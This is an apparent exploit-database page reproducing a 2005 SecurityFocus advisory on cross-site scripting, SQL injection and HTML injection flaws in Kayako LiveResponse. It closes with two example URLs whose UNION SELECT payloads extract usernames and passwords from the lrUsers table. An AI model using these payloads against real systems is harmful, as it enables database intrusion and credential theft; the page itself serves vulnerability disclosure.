header-logo
Suggest Exploit
vendor:
LiveResponse
by:
SecurityFocus
8.8
CVSS
HIGH
Cross-Site Scripting, SQL Injection, and HTML Injection
79, 89, 89, 89
CWE
Product Name: LiveResponse
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

Kayako LiveResponse Multiple Cross-Site Scripting, SQL Injection, and HTML Injection Vulnerabilities

Kayako LiveResponse is prone to multiple cross-site scripting, SQL injection, and HTML injection vulnerabilities. These issues are all related to input validation errors. The cross-site scripting and HTML injection vulnerabilities may allow for theft of cookie-based authentication credentials or other attacks. The SQL injection vulnerabilities may permit a remote attacker to compromise the software or launch attacks other attacks against the database.

Mitigation:

Input validation should be used to prevent malicious input from entering the system.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/14425/info
 
Kayako LiveResponse is prone to multiple cross-site scripting, SQL injection, and HTML injection vulnerabilties. These issues are all related to input validation errors.
 
The cross-site scripting and HTML injection vulnerabilities may allow for theft of cookie-based authentication credentials or other attacks. The SQL injection vulnerabilities may permit a remote attacker to compromise the software or launch attacks other attacks against the database. 

http://www.example.com/index.php?date=22&month=3&year=2005%20UNION%20SELECT%200,0,0,0,0,0,
username,pass%20FROM%20lrUsers%20WHERE%201/*&_g=2&_a=panel&_m=cal

http://www.example.com/index.php?date=22%20UNION%20SELECT%200,0,0,0,0,0,username,pass%20
FROM%20lrUsers%20WHERE%201/*&month=3&year=2005&_g=2&_a=panel&_m=cal